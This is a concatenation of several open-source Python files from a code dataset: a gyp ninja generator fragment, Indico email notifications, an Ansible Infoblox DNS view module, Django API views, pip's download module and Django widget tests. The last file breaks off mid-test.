  GenerateOutputForConfig(*arglist)
def GenerateOutput(target_list, target_dicts, data, params):
  """Generator entry point: writes ninja files for one or all configurations.

  If generator_flags specifies a single 'config' it is generated directly;
  otherwise every configuration is generated, in parallel worker processes
  when params['parallel'] is set.
  """
  # Update target_dicts for iOS device builds.
  target_dicts = gyp.xcode_emulation.CloneConfigurationForDeviceAndEmulator(
      target_dicts)

  user_config = params.get('generator_flags', {}).get('config', None)
  if gyp.common.GetFlavor(params) == 'win':
    target_list, target_dicts = MSVSUtil.ShardTargets(target_list, target_dicts)
    target_list, target_dicts = MSVSUtil.InsertLargePdbShims(
        target_list, target_dicts, generator_default_variables)

  if user_config:
    GenerateOutputForConfig(target_list, target_dicts, data, params,
                            user_config)
  else:
    config_names = target_dicts[target_list[0]]['configurations'].keys()
    if params['parallel']:
      # Create the pool before entering the try block so that a failure
      # during construction can't reach pool.terminate() on an unbound name.
      pool = multiprocessing.Pool(len(config_names))
      try:
        arglists = []
        for config_name in config_names:
          arglists.append(
              (target_list, target_dicts, data, params, config_name))
        pool.map(CallGenerateOutputForConfig, arglists)
      except KeyboardInterrupt:
        pool.terminate()
        # Bare 'raise' preserves the original traceback; 're-raise e' would
        # reset it on Python 2. ('except X, e' was also Python-2-only syntax;
        # gyp requires >= 2.6 where this form works too.)
        raise
    else:
      for config_name in config_names:
        GenerateOutputForConfig(target_list, target_dicts, data, params,
                                config_name)
| mit |
jacquesd/indico | indico/modules/vc/notifications.py | 2 | 2446 | # This file is part of Indico.
# Copyright (C) 2002 - 2015 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.core.notifications import make_email, send_email
from indico.web.flask.templating import get_template_module, get_overridable_template_name
from indico.modules.vc.util import get_linked_to_description
def notify_created(plugin, room, room_assoc, event, user):
    """Notifies about the creation of a vc_room.

    :param plugin: the VC plugin the room belongs to
    :param room: the vc_room
    :param room_assoc: the association linking the room to the event
    :param event: the event
    :param user: the user performing the action
    """
    tpl_name = get_overridable_template_name('emails/created.html', plugin, core_prefix='vc/')
    template = get_template_module(tpl_name, plugin=plugin, vc_room=room, event=event, vc_room_event=room_assoc,
                                   user=user, linked_to_title=get_linked_to_description(room_assoc))
    _send('create', user, plugin, event, room, template)
def notify_deleted(plugin, room, room_assoc, event, user):
    """Notifies about the deletion of a vc_room from the system.

    :param plugin: the VC plugin the room belongs to
    :param room: the vc_room
    :param room_assoc: the association linking the room to the event
    :param event: the event
    :param user: the user performing the action
    """
    tpl_name = get_overridable_template_name('emails/deleted.html', plugin, core_prefix='vc/')
    template = get_template_module(tpl_name, plugin=plugin, vc_room=room, event=event, vc_room_event=room_assoc,
                                   user=user)
    _send('delete', user, plugin, event, room, template)
def _send(action, user, plugin, event, room, template_module):
    """Builds and sends the notification email for a vc_room *action*.

    The acting user is the primary recipient; the plugin supplies CC/BCC
    lists, which are de-duplicated against the higher-priority fields.
    """
    recipients = {user.email}
    cc = plugin.get_notification_cc_list(action, room, event) - recipients
    bcc = plugin.get_notification_bcc_list(action, room, event) - cc - recipients
    email = make_email(recipients, cc, bcc, template=template_module, html=True)
    send_email(email, event, plugin.friendly_name)
| gpl-3.0 |
mavit/ansible | lib/ansible/modules/net_tools/nios/nios_dns_view.py | 12 | 4187 | #!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: nios_dns_view
version_added: "2.5"
author: "Peter Sprygada (@privateip)"
short_description: Configure Infoblox NIOS DNS views
description:
- Adds and/or removes instances of DNS view objects from
Infoblox NIOS servers. This module manages NIOS C(view) objects
using the Infoblox WAPI interface over REST.
- Updates instances of DNS view object from Infoblox NIOS servers.
requirements:
- infoblox-client
extends_documentation_fragment: nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system. User can also update the hostname as it is possible
to pass a dict containing I(new_name), I(old_name). See examples.
required: true
aliases:
- view
network_view:
description:
- Specifies the name of the network view to assign the configured
DNS view to. The network view must already be configured on the
target system.
required: true
default: default
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
required: false
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
required: false
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
required: false
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: configure a new dns view instance
nios_dns_view:
name: ansible-dns
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the comment for dns view
nios_dns_view:
name: ansible-dns
comment: this is an example comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: remove the dns view instance
nios_dns_view:
name: ansible-dns
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the dns view instance
nios_dns_view:
name: {new_name: ansible-dns-new, old_name: ansible-dns}
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.net_tools.nios.api import WapiModule
from ansible.module_utils.net_tools.nios.api import NIOS_DNS_VIEW
def main():
    """Main entry point for module execution."""
    # WAPI object fields for the NIOS 'view' object; ib_req marks fields
    # used to look the object up on the grid.
    ib_spec = dict(
        name=dict(required=True, aliases=['view'], ib_req=True),
        network_view=dict(default='default', ib_req=True),
        extattrs=dict(type='dict'),
        comment=dict()
    )

    # Module-level arguments layered on top of the WAPI field spec.
    argument_spec = dict(
        provider=dict(required=True),
        state=dict(default='present', choices=['present', 'absent'])
    )
    argument_spec.update(ib_spec)
    argument_spec.update(WapiModule.provider_spec)

    module = AnsibleModule(argument_spec=argument_spec,
                           supports_check_mode=True)

    result = WapiModule(module).run(NIOS_DNS_VIEW, ib_spec)
    module.exit_json(**result)


if __name__ == '__main__':
    main()
| gpl-3.0 |
czgu/opendataexperience | server/api/views/query.py | 1 | 1608 | from django.forms.models import model_to_dict
from django.http import JsonResponse
from django.http import Http404
from api.models import DetailedFoodNutritions
from api.models import FoodCategory
from api.models import FoodCategorySpec
def food_handler(request):
    """Returns the nutrition details for the food given by ?name=... as JSON.

    Raises Http404 when the name is missing/empty or no matching food exists.
    """
    if request.method != 'GET':
        return JsonResponse({})
    # Fetch the raw parameter first: the old str(...) wrapper turned a missing
    # parameter (None) into the truthy string 'None', so the "not provided"
    # guard below could never fire.
    food_name = request.GET.get('name')
    if not food_name:
        raise Http404('name not provided')
    try:
        food = DetailedFoodNutritions.objects.get(food_name=food_name)
    except DetailedFoodNutritions.DoesNotExist:
        # The name is already interpolated into the message; no extra arg.
        raise Http404('food %s not found' % food_name)
    return JsonResponse(food.toDict())
def category_all_handler(request):
    """Returns every FoodCategory as JSON: {'categories': [...]}."""
    if request.method != 'GET':
        return JsonResponse({})
    categories = FoodCategory.objects.all()
    # A list comprehension (instead of map + lambda) is the idiomatic form and
    # keeps the payload JSON-serializable on Python 3, where map() is lazy.
    return JsonResponse(
        {'categories': [model_to_dict(category) for category in categories]})
def category_all_detailed_handler(request):
    """Returns all food categories with their sub-categories nested inline."""
    if request.method != 'GET':
        return JsonResponse({})
    payload = []
    for category in FoodCategory.objects.all():
        entry = model_to_dict(category)
        entry['sub_categories'] = []
        for spec in category.foodcategoryspec_set.all():
            spec_dict = model_to_dict(spec)
            # The parent is implied by the nesting; drop the back-reference.
            del spec_dict['general_category']
            entry['sub_categories'].append(spec_dict)
        payload.append(entry)
    return JsonResponse({'categories': payload})
| apache-2.0 |
camilonos77/bootstrap-form-python-generator | enviroment/lib/python2.7/site-packages/pip/download.py | 328 | 22580 | import cgi
import email.utils
import hashlib
import getpass
import mimetypes
import os
import platform
import re
import shutil
import sys
import tempfile
import pip
from pip.backwardcompat import urllib, urlparse, raw_input
from pip.exceptions import InstallationError, HashMismatch
from pip.util import (splitext, rmtree, format_size, display_path,
backup_dir, ask_path_exists, unpack_file,
create_download_cache_folder, cache_download)
from pip.vcs import vcs
from pip.log import logger
from pip._vendor import requests, six
from pip._vendor.requests.adapters import BaseAdapter
from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth
from pip._vendor.requests.compat import IncompleteRead
from pip._vendor.requests.exceptions import InvalidURL, ChunkedEncodingError
from pip._vendor.requests.models import Response
from pip._vendor.requests.structures import CaseInsensitiveDict
__all__ = ['get_file_content',
'is_url', 'url_to_path', 'path_to_url',
'is_archive_file', 'unpack_vcs_link',
'unpack_file_url', 'is_vcs_url', 'is_file_url', 'unpack_http_url']
def user_agent():
    """Return a string representing the user agent."""
    impl = platform.python_implementation()
    if impl == 'CPython':
        impl_version = platform.python_version()
    elif impl == 'PyPy':
        info = sys.pypy_version_info
        impl_version = '%s.%s.%s' % (info.major, info.minor, info.micro)
        # Non-final PyPy releases tag the level (e.g. 'beta') onto the version.
        if info.releaselevel != 'final':
            impl_version += info.releaselevel
    elif impl == 'Jython':
        impl_version = platform.python_version()  # Complete Guess
    elif impl == 'IronPython':
        impl_version = platform.python_version()  # Complete Guess
    else:
        impl_version = 'Unknown'

    # platform.system()/release() can raise IOError on some restricted
    # systems; fall back to 'Unknown' rather than failing the request.
    try:
        p_system = platform.system()
        p_release = platform.release()
    except IOError:
        p_system = 'Unknown'
        p_release = 'Unknown'

    return ' '.join(['pip/%s' % pip.__version__,
                     '%s/%s' % (impl, impl_version),
                     '%s/%s' % (p_system, p_release)])
class MultiDomainBasicAuth(AuthBase):
    """Requests auth helper that remembers HTTP basic-auth credentials
    per host (netloc).

    Credentials embedded in a URL are stripped from the request, cached,
    and replayed on later requests to the same host.  On a 401 response the
    user is (optionally) prompted for credentials and the request retried.
    """
    def __init__(self, prompting=True):
        # prompting: whether to interactively ask the user on a 401 response.
        self.prompting = prompting
        # Maps netloc (without embedded credentials) -> (username, password).
        self.passwords = {}
    def __call__(self, req):
        """Attach stored or URL-embedded basic-auth credentials to ``req``."""
        parsed = urlparse.urlparse(req.url)
        # Get the netloc without any embedded credentials
        netloc = parsed.netloc.split("@", 1)[-1]
        # Set the url of the request to the url without any credentials
        req.url = urlparse.urlunparse(parsed[:1] + (netloc,) + parsed[2:])
        # Use any stored credentials that we have for this netloc
        username, password = self.passwords.get(netloc, (None, None))
        # Extract credentials embedded in the url if we have none stored
        if username is None:
            username, password = self.parse_credentials(parsed.netloc)
        if username or password:
            # Store the username and password
            self.passwords[netloc] = (username, password)
            # Send the basic auth with this request
            req = HTTPBasicAuth(username or "", password or "")(req)
        # Attach a hook to handle 401 responses
        req.register_hook("response", self.handle_401)
        return req
    def handle_401(self, resp, **kwargs):
        """Response hook: on a 401, prompt for credentials and retry once."""
        # We only care about 401 responses, anything else we want to just
        # pass through the actual response
        if resp.status_code != 401:
            return resp
        # We are not able to prompt the user so simple return the response
        if not self.prompting:
            return resp
        parsed = urlparse.urlparse(resp.url)
        # Prompt the user for a new username and password
        username = raw_input("User for %s: " % parsed.netloc)
        password = getpass.getpass("Password: ")
        # Store the new username and password to use for future requests
        if username or password:
            self.passwords[parsed.netloc] = (username, password)
        # Consume content and release the original connection to allow our new
        # request to reuse the same one.
        resp.content
        resp.raw.release_conn()
        # Add our new username and password to the request
        req = HTTPBasicAuth(username or "", password or "")(resp.request)
        # Send our new request
        new_resp = resp.connection.send(req, **kwargs)
        new_resp.history.append(resp)
        return new_resp
    def parse_credentials(self, netloc):
        """Return (username, password) parsed from a 'user:pass@host' netloc.

        Returns (user, None) if no password part exists and (None, None)
        when no credentials are embedded at all.
        """
        if "@" in netloc:
            userinfo = netloc.rsplit("@", 1)[0]
            if ":" in userinfo:
                return userinfo.split(":", 1)
            return userinfo, None
        return None, None
class LocalFSResponse(object):
    """Wrap a plain file object so it can stand in for an urllib3 response."""

    def __init__(self, fileobj):
        self.fileobj = fileobj

    def __getattr__(self, name):
        # Delegate everything we do not define ourselves to the file object.
        return getattr(self.fileobj, name)

    def read(self, amt=None, decode_content=None, cache_content=False):
        # urllib3 passes decode/cache flags; a local file has no use for them.
        return self.fileobj.read(amt)

    # Insert hacks to make the cookie-jar machinery accept this response.
    @property
    def _original_response(self):
        class _EmptyHeaders(object):
            def getheaders(self, header):
                return []

            def get_all(self, header, default):
                return []

        class _FakeHTTPResponse(object):
            @property
            def msg(self):
                return _EmptyHeaders()

        return _FakeHTTPResponse()
class LocalFSAdapter(BaseAdapter):
    """Transport adapter serving ``file://localhost/...`` URLs from disk."""

    def send(self, request, stream=None, timeout=None, verify=None, cert=None,
             proxies=None):
        parts = urlparse.urlparse(request.url)
        # We only work for requests with a host of localhost
        if parts.netloc.lower() != "localhost":
            raise InvalidURL("Invalid URL %r: Only localhost is allowed" %
                             request.url)
        # Drop the netloc so url_to_path sees a plain file: URL.
        file_url = urlparse.urlunparse(parts[:1] + ("",) + parts[2:])
        pathname = url_to_path(file_url)
        stats = os.stat(pathname)
        modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
        resp = Response()
        resp.status_code = 200
        resp.url = file_url
        resp.headers = CaseInsensitiveDict({
            "Content-Type": mimetypes.guess_type(pathname)[0] or "text/plain",
            "Content-Length": stats.st_size,
            "Last-Modified": modified,
        })
        resp.raw = LocalFSResponse(open(pathname, "rb"))
        resp.close = resp.raw.close
        return resp

    def close(self):
        # Nothing to release: each send() hands its file to the response.
        pass
class PipSession(requests.Session):
    """requests.Session preconfigured for pip: UA header, auth, file:// URLs."""

    # Default timeout applied to every request made through this session.
    timeout = None

    def __init__(self, *args, **kwargs):
        super(PipSession, self).__init__(*args, **kwargs)
        # Attach our User Agent to the request
        self.headers["User-Agent"] = user_agent()
        # Attach our Authentication handler to the session
        self.auth = MultiDomainBasicAuth()
        # Enable file:// urls
        self.mount("file://", LocalFSAdapter())

    def request(self, method, url, *args, **kwargs):
        # file:// urls without a hostname would otherwise fail; force
        # "localhost" so LocalFSAdapter accepts the netloc.
        parts = urlparse.urlparse(url)
        if parts.scheme == "file":
            url = urlparse.urlunparse(parts[:1] + ("localhost",) + parts[2:])
        # Allow setting a default timeout on a session
        kwargs.setdefault("timeout", self.timeout)
        # Dispatch the actual request
        return super(PipSession, self).request(method, url, *args, **kwargs)
def get_file_content(url, comes_from=None, session=None):
    """Gets the content of a file; it may be a filename, file: URL, or
    http: URL.  Returns (location, content). Content is unicode.

    :param url: filename, ``file:`` URL, or ``http(s):`` URL to read.
    :param comes_from: URL of the requirements file that referenced *url*;
        used to forbid a remote requirements file from referencing local files.
    :param session: optional PipSession; a fresh one is created if omitted.
    :raises InstallationError: when a remote requirements file references a
        local URL, or when the local file cannot be opened.
    """
    if session is None:
        session = PipSession()
    match = _scheme_re.search(url)
    if match:
        scheme = match.group(1).lower()
        if (scheme == 'file' and comes_from
                and comes_from.startswith('http')):
            raise InstallationError(
                'Requirements file %s references URL %s, which is local'
                % (comes_from, url))
        if scheme == 'file':
            path = url.split(':', 1)[1]
            path = path.replace('\\', '/')
            match = _url_slash_drive_re.match(path)
            if match:
                # Normalize "C|/..." drive spellings to "C:/..."
                path = match.group(1) + ':' + path.split('|', 1)[1]
            path = urllib.unquote(path)
            if path.startswith('/'):
                # Collapse any run of leading slashes to a single one.
                path = '/' + path.lstrip('/')
            url = path
        else:
            ## FIXME: catch some errors
            resp = session.get(url)
            resp.raise_for_status()
            if six.PY3:
                return resp.url, resp.text
            else:
                return resp.url, resp.content
    try:
        # "with" guarantees the handle is closed even if read() raises,
        # which the previous open()/read()/close() sequence did not.
        with open(url) as f:
            content = f.read()
    except IOError:
        e = sys.exc_info()[1]
        raise InstallationError('Could not open requirements file: %s' % str(e))
    return url, content
# Matches a URL scheme prefix (http/https/file) at the start of a string.
_scheme_re = re.compile(r'^(http|https|file):', re.I)
# Matches Windows drive letters spelled with a pipe, e.g. "/C|/path".
_url_slash_drive_re = re.compile(r'/*([a-z])\|', re.I)
def is_url(name):
    """Returns true if the name looks like a URL"""
    scheme, sep, _rest = name.partition(':')
    if not sep:
        # No colon at all, so there is no scheme prefix.
        return False
    return scheme.lower() in ['http', 'https', 'file', 'ftp'] + vcs.all_schemes
def url_to_path(url):
    """
    Convert a file: URL to a local filesystem path.
    """
    assert url.startswith('file:'), (
        "You can only turn file: urls into filenames (not %r)" % url)
    remainder = url[len('file:'):].lstrip('/')
    remainder = urllib.unquote(remainder)
    if _url_drive_re.match(remainder):
        # Windows: "c:..." or "c|..." becomes "c:<rest>".
        return remainder[0] + ':' + remainder[2:]
    # POSIX: re-root the path at "/".
    return '/' + remainder
# Matches a Windows drive letter followed by ":" at the start of a path.
_drive_re = re.compile('^([a-z]):', re.I)
# As above, but also accepts the "|" spelling used in some file: URLs.
_url_drive_re = re.compile('^([a-z])[:|]', re.I)
def path_to_url(path):
    """
    Convert a path to a file: URL. The path will be made absolute and have
    quoted path parts.
    """
    path = os.path.normpath(os.path.abspath(path))
    drive, path = os.path.splitdrive(path)
    quoted_parts = [urllib.quote(part) for part in path.split(os.path.sep)]
    url = '/'.join(quoted_parts)
    if not drive:
        # Without a drive the joined path already starts with "/".
        url = url.lstrip('/')
    return 'file:///' + drive + url
def is_archive_file(name):
    """Return True if `name` is a considered as an archive file."""
    archives = ('.zip', '.tar.gz', '.tar.bz2', '.tgz', '.tar', '.pybundle',
                '.whl')
    # NOTE(review): splitext here appears to be pip's own helper that keeps
    # multi-part suffixes such as ".tar.gz" intact — confirm it is not
    # os.path.splitext.
    ext = splitext(name)[1].lower()
    # The membership test already yields the boolean we need.
    return ext in archives
def unpack_vcs_link(link, location, only_download=False):
    """Check out (or export, when only downloading) a VCS link to *location*."""
    backend = _get_used_vcs_backend(link)
    if only_download:
        backend.export(location)
    else:
        backend.unpack(location)
def _get_used_vcs_backend(link):
    """Return a VCS backend instance for *link*, or None when none matches."""
    for candidate in vcs.backends:
        if link.scheme in candidate.schemes:
            return candidate(link.url)
def is_vcs_url(link):
    """True when a registered VCS backend claims this link's scheme."""
    backend = _get_used_vcs_backend(link)
    return bool(backend)
def is_file_url(link):
    """True when the link's URL uses the ``file:`` scheme (any case)."""
    url = link.url.lower()
    return url.startswith('file:')
def _check_hash(download_hash, link):
    """Validate *download_hash* against the hash recorded on *link*.

    Raises HashMismatch when either the algorithm or the digest differs.
    """
    expected_size = hashlib.new(link.hash_name).digest_size
    if download_hash.digest_size != expected_size:
        logger.fatal("Hash digest size of the package %d (%s) doesn't match the expected hash name %s!"
                     % (download_hash.digest_size, link, link.hash_name))
        raise HashMismatch('Hash name mismatch for package %s' % link)
    actual = download_hash.hexdigest()
    if actual != link.hash:
        logger.fatal("Hash of the package %s (%s) doesn't match the expected hash %s!"
                     % (link, actual, link.hash))
        raise HashMismatch('Bad %s hash for package %s' % (link.hash_name, link))
def _get_hash_from_file(target_file, link):
try:
download_hash = hashlib.new(link.hash_name)
except (ValueError, TypeError):
logger.warn("Unsupported hash name %s for package %s" % (link.hash_name, link))
return None
fp = open(target_file, 'rb')
while True:
chunk = fp.read(4096)
if not chunk:
break
download_hash.update(chunk)
fp.close()
return download_hash
def _download_url(resp, link, temp_location):
    """Stream the response body of *resp* into *temp_location* with progress.

    Returns the hash object fed with the downloaded bytes (for comparison
    with ``link.hash``), or None when no usable hash name is available.
    """
    download_hash = None
    if link.hash and link.hash_name:
        try:
            download_hash = hashlib.new(link.hash_name)
        except ValueError:
            logger.warn("Unsupported hash name %s for package %s" % (link.hash_name, link))
    try:
        total_length = int(resp.headers['content-length'])
    except (ValueError, KeyError, TypeError):
        total_length = 0
    downloaded = 0
    # Progress is shown for large or unknown-size downloads only.
    show_progress = total_length > 40 * 1000 or not total_length
    show_url = link.show_url
    try:
        if show_progress:
            ## FIXME: the URL can get really long in this message:
            if total_length:
                logger.start_progress('Downloading %s (%s): ' % (show_url, format_size(total_length)))
            else:
                logger.start_progress('Downloading %s (unknown size): ' % show_url)
        else:
            logger.notify('Downloading %s' % show_url)
        logger.info('Downloading from URL %s' % link)
        def resp_read(chunk_size):
            # Yield raw (undecoded) chunks from either a urllib3 response
            # or a plain file-like object.
            try:
                # Special case for urllib3.
                try:
                    for chunk in resp.raw.stream(
                            chunk_size, decode_content=False):
                        yield chunk
                except IncompleteRead as e:
                    raise ChunkedEncodingError(e)
            except AttributeError:
                # Standard file-like object.
                while True:
                    chunk = resp.raw.read(chunk_size)
                    if not chunk:
                        break
                    yield chunk
        # "with" closes the target file even when the download raises,
        # which the old open()/close() pairing failed to do.
        with open(temp_location, 'wb') as fp:
            for chunk in resp_read(4096):
                downloaded += len(chunk)
                if show_progress:
                    if not total_length:
                        logger.show_progress('%s' % format_size(downloaded))
                    else:
                        logger.show_progress('%3i%% %s' % (100 * downloaded / total_length, format_size(downloaded)))
                if download_hash is not None:
                    download_hash.update(chunk)
                fp.write(chunk)
    finally:
        if show_progress:
            logger.end_progress('%s downloaded' % format_size(downloaded))
    return download_hash
def _copy_file(filename, location, content_type, link):
    """Copy *filename* into *location*, asking what to do on a name clash."""
    download_location = os.path.join(location, link.filename)
    should_copy = True
    if os.path.exists(download_location):
        response = ask_path_exists(
            'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
            display_path(download_location), ('i', 'w', 'b'))
        if response == 'i':
            should_copy = False
        elif response == 'w':
            logger.warn('Deleting %s' % display_path(download_location))
            os.remove(download_location)
        elif response == 'b':
            dest_file = backup_dir(download_location)
            logger.warn('Backing up %s to %s'
                        % (display_path(download_location), display_path(dest_file)))
            shutil.move(download_location, dest_file)
    if should_copy:
        shutil.copy(filename, download_location)
        logger.notify('Saved %s' % display_path(download_location))
def unpack_http_url(link, location, download_cache, download_dir=None,
                    session=None):
    """Fetch *link* over HTTP (or reuse a cached/downloaded copy) and unpack
    it into *location*.

    A valid copy is looked for first in *download_dir*, then in
    *download_cache*; only when neither holds one with a matching hash is
    the file actually downloaded.
    """
    if session is None:
        session = PipSession()
    temp_dir = tempfile.mkdtemp('-unpack', 'pip-')
    temp_location = None
    target_url = link.url.split('#', 1)[0]
    already_cached = False
    cache_file = None
    cache_content_type_file = None
    download_hash = None
    # If a download cache is specified, is the file cached there?
    if download_cache:
        cache_file = os.path.join(download_cache,
                                  urllib.quote(target_url, ''))
        cache_content_type_file = cache_file + '.content-type'
        already_cached = (
            os.path.exists(cache_file) and
            os.path.exists(cache_content_type_file)
        )
        if not os.path.isdir(download_cache):
            create_download_cache_folder(download_cache)
    # If a download dir is specified, is the file already downloaded there?
    already_downloaded = None
    if download_dir:
        already_downloaded = os.path.join(download_dir, link.filename)
        if not os.path.exists(already_downloaded):
            already_downloaded = None
    # If already downloaded, does its hash match?
    if already_downloaded:
        temp_location = already_downloaded
        content_type = mimetypes.guess_type(already_downloaded)[0]
        logger.notify('File was already downloaded %s' % already_downloaded)
        if link.hash:
            download_hash = _get_hash_from_file(temp_location, link)
            try:
                _check_hash(download_hash, link)
            except HashMismatch:
                logger.warn(
                    'Previously-downloaded file %s has bad hash, '
                    're-downloading.' % temp_location
                )
                temp_location = None
                os.unlink(already_downloaded)
                already_downloaded = None
    # If not a valid download, let's confirm the cached file is valid
    if already_cached and not temp_location:
        with open(cache_content_type_file) as fp:
            content_type = fp.read().strip()
        temp_location = cache_file
        logger.notify('Using download cache from %s' % cache_file)
        if link.hash and link.hash_name:
            download_hash = _get_hash_from_file(cache_file, link)
            try:
                _check_hash(download_hash, link)
            except HashMismatch:
                logger.warn(
                    'Cached file %s has bad hash, '
                    're-downloading.' % temp_location
                )
                temp_location = None
                os.unlink(cache_file)
                os.unlink(cache_content_type_file)
                already_cached = False
    # We don't have either a cached or a downloaded copy
    # let's download to a tmp dir
    if not temp_location:
        try:
            resp = session.get(target_url, stream=True)
            resp.raise_for_status()
        except requests.HTTPError as exc:
            logger.fatal("HTTP error %s while getting %s" %
                         (exc.response.status_code, link))
            raise
        content_type = resp.headers.get('content-type', '')
        filename = link.filename  # fallback
        # Have a look at the Content-Disposition header for a better guess
        content_disposition = resp.headers.get('content-disposition')
        if content_disposition:
            type, params = cgi.parse_header(content_disposition)
            # We use ``or`` here because we don't want to use an "empty" value
            # from the filename param.
            filename = params.get('filename') or filename
        ext = splitext(filename)[1]
        if not ext:
            # No usable extension: guess one from the content type, then
            # from the final (possibly redirected) URL.
            ext = mimetypes.guess_extension(content_type)
            if ext:
                filename += ext
        if not ext and link.url != resp.url:
            ext = os.path.splitext(resp.url)[1]
            if ext:
                filename += ext
        temp_location = os.path.join(temp_dir, filename)
        download_hash = _download_url(resp, link, temp_location)
        if link.hash and link.hash_name:
            _check_hash(download_hash, link)
    # a download dir is specified; let's copy the archive there
    if download_dir and not already_downloaded:
        _copy_file(temp_location, download_dir, content_type, link)
    # unpack the archive to the build dir location. even when only downloading
    # archives, they have to be unpacked to parse dependencies
    unpack_file(temp_location, location, content_type, link)
    # if using a download cache, cache it, if needed
    if cache_file and not already_cached:
        cache_download(cache_file, temp_location, content_type)
    if not (already_cached or already_downloaded):
        os.unlink(temp_location)
    os.rmdir(temp_dir)
def unpack_file_url(link, location, download_dir=None):
    """Unpack a file: URL (directory or archive file) into *location*.

    Directories are copied wholesale; files are hash-checked when the link
    carries a hash, optionally reused from *download_dir*, and unpacked.
    """
    link_path = url_to_path(link.url_without_fragment)
    already_downloaded = False
    # If it's a url to a local directory
    if os.path.isdir(link_path):
        if os.path.isdir(location):
            rmtree(location)
        shutil.copytree(link_path, location, symlinks=True)
        return
    # if link has a hash, let's confirm it matches
    if link.hash:
        link_path_hash = _get_hash_from_file(link_path, link)
        _check_hash(link_path_hash, link)
    # If a download dir is specified, is the file already there and valid?
    if download_dir:
        download_path = os.path.join(download_dir, link.filename)
        if os.path.exists(download_path):
            content_type = mimetypes.guess_type(download_path)[0]
            logger.notify('File was already downloaded %s' % download_path)
            if link.hash:
                download_hash = _get_hash_from_file(download_path, link)
                try:
                    _check_hash(download_hash, link)
                    already_downloaded = True
                except HashMismatch:
                    logger.warn(
                        'Previously-downloaded file %s has bad hash, '
                        're-downloading.' % link_path
                    )
                    os.unlink(download_path)
            else:
                already_downloaded = True
    # Prefer the (validated) copy in download_dir over the original path.
    if already_downloaded:
        from_path = download_path
    else:
        from_path = link_path
    content_type = mimetypes.guess_type(from_path)[0]
    # unpack the archive to the build dir location. even when only downloading
    # archives, they have to be unpacked to parse dependencies
    unpack_file(from_path, location, content_type, link)
    # a download dir is specified and not already downloaded
    if download_dir and not already_downloaded:
        _copy_file(from_path, download_dir, content_type, link)
| gpl-2.0 |
sjlehtin/django | tests/forms_tests/widget_tests/test_selectmultiple.py | 38 | 5366 | from django.forms import SelectMultiple
from .base import WidgetTest
class SelectMultipleTest(WidgetTest):
    """Rendering tests for the SelectMultiple widget.

    check_html() compares rendered output with assertHTMLEqual semantics,
    so the expected-HTML strings below are whitespace-insensitive but must
    match attribute-for-attribute.
    """
    widget = SelectMultiple
    # Note the deliberate duplicate '0' value: used by
    # test_multiple_options_same_value below.
    numeric_choices = (('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('0', 'extra'))
    def test_format_value(self):
        widget = self.widget(choices=self.numeric_choices)
        self.assertEqual(widget.format_value(None), [''])
        self.assertEqual(widget.format_value(''), [''])
        self.assertEqual(widget.format_value([3, 0, 1]), ['3', '0', '1'])
    def test_render_selected(self):
        self.check_html(self.widget(choices=self.beatles), 'beatles', ['J'], html=(
            """<select multiple="multiple" name="beatles">
            <option value="J" selected>John</option>
            <option value="P">Paul</option>
            <option value="G">George</option>
            <option value="R">Ringo</option>
            </select>"""
        ))
    def test_render_multiple_selected(self):
        self.check_html(self.widget(choices=self.beatles), 'beatles', ['J', 'P'], html=(
            """<select multiple="multiple" name="beatles">
            <option value="J" selected>John</option>
            <option value="P" selected>Paul</option>
            <option value="G">George</option>
            <option value="R">Ringo</option>
            </select>"""
        ))
    def test_render_none(self):
        """
        If the value is None, none of the options are selected.
        """
        self.check_html(self.widget(choices=self.beatles), 'beatles', None, html=(
            """<select multiple="multiple" name="beatles">
            <option value="J">John</option>
            <option value="P">Paul</option>
            <option value="G">George</option>
            <option value="R">Ringo</option>
            </select>"""
        ))
    def test_render_value_label(self):
        """
        If the value corresponds to a label (but not to an option value), none
        of the options are selected.
        """
        self.check_html(self.widget(choices=self.beatles), 'beatles', ['John'], html=(
            """<select multiple="multiple" name="beatles">
            <option value="J">John</option>
            <option value="P">Paul</option>
            <option value="G">George</option>
            <option value="R">Ringo</option>
            </select>"""
        ))
    def test_multiple_options_same_value(self):
        """
        Multiple options with the same value can be selected (#8103).
        """
        self.check_html(self.widget(choices=self.numeric_choices), 'choices', ['0'], html=(
            """<select multiple="multiple" name="choices">
            <option value="0" selected>0</option>
            <option value="1">1</option>
            <option value="2">2</option>
            <option value="3">3</option>
            <option value="0" selected>extra</option>
            </select>"""
        ))
    def test_multiple_values_invalid(self):
        """
        If multiple values are given, but some of them are not valid, the valid
        ones are selected.
        """
        self.check_html(self.widget(choices=self.beatles), 'beatles', ['J', 'G', 'foo'], html=(
            """<select multiple="multiple" name="beatles">
            <option value="J" selected>John</option>
            <option value="P">Paul</option>
